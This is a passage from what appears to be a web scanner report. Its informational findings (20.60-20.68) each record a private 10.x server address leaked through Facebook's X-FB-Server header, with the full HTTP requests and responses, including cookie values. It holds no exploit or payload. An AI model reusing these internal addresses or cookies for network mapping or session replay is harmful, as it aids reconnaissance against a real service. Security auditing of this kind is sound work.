f21d1efae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3187a3d4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df231940b58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff21d1efae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3187a3d4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f789dd148&origin=http%3A%2F%2Faol.sportingnews.com%2Ff21d1efae&relation=parent&transport=postmessage&frame=f3187a3d4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.66.35
X-Cnection: close
Date: Thu, 05 May 2011 01:52:54 GMT
Content-Length: 0


20.60. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.57.69

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df308eabbc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6a416888%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21ae57fb%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3842c056%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21ae57fb&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32608145c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21ae57fb&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df115113c5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21ae57fb&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f32608145c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3f72ef73c&relation=parent&transport=postmessage&frame=f21ae57fb
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.57.69
X-Cnection: close
Date: Thu, 05 May 2011 01:01:26 GMT
Content-Length: 0


20.61. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.53.21.45

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1339cc754%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e588f108%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7e80b42%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ee1c9d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7e80b42&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f13e5a08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7e80b42&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c304d4ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7e80b42&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2f13e5a08&origin=http%3A%2F%2Faol.sportingnews.com%2Ff6b0a6094&relation=parent&transport=postmessage&frame=f7e80b42
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.21.45
X-Cnection: close
Date: Thu, 05 May 2011 01:46:08 GMT
Content-Length: 0


20.62. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.55.121

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b9d3984%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df328e7f2d8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfced2d8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df96c8bf4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfced2d8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2587c00cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfced2d8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5fe916a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfced2d8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2587c00cc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2ae3f690&relation=parent&transport=postmessage&frame=fced2d8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.55.121
X-Cnection: close
Date: Thu, 05 May 2011 02:08:08 GMT
Content-Length: 0


20.63. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.196.58

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df170bd0aa8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df356616aec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a74e3d8c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df74e3345c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a74e3d8c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ff7cfac4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a74e3d8c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cbc8450%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a74e3d8c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3ff7cfac4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3b3e8335c&relation=parent&transport=postmessage&frame=f3a74e3d8c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.196.58
X-Cnection: close
Date: Thu, 05 May 2011 01:55:40 GMT
Content-Length: 0


20.64. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.170.63

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fabf25c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ac5a7018%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df171530904%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df26eeb8de4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df171530904&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2cd7fd808%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df171530904&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1673c10b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df171530904&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2cd7fd808&origin=http%3A%2F%2Faol.sportingnews.com%2Ff37853b0a&relation=parent&transport=postmessage&frame=f171530904
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.170.63
X-Cnection: close
Date: Thu, 05 May 2011 01:28:00 GMT
Content-Length: 0


20.65. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.131.112

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e0100b74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c42d3d3c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa6b0fa98%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe2f33c38%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa6b0fa98&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df72799f14%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa6b0fa98&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f33cb98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa6b0fa98&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f72799f14&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2b1247504&relation=parent&transport=postmessage&frame=fa6b0fa98
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.131.112
X-Cnection: close
Date: Thu, 05 May 2011 01:06:55 GMT
Content-Length: 0


20.66. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.184.77

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10089c9e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20c937f5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a59c0a7%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2426545d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a59c0a7&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f94026b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a59c0a7&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df181840e9%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a59c0a7&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2f94026b8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff108e0ea74&relation=parent&transport=postmessage&frame=f2a59c0a7
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.184.77
X-Cnection: close
Date: Thu, 05 May 2011 02:12:17 GMT
Content-Length: 0


20.67. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.185.67

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9f2b9a3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1853bb678%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe1c606f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfff1bc7e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a034a798%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3025efcb8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ce7949c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fff1bc7e8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3025efcb8&relation=parent&transport=postmessage&frame=f3ce7949c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.185.67
X-Cnection: close
Date: Thu, 05 May 2011 02:10:56 GMT
Content-Length: 0


20.68. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.92.95

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df113f3a634%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcdd5d89%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7bf85e88%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3eb37e814%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7bf85e88&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffe4095ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7bf85e88&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27e2a5944%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c97d5318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7bf85e88&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
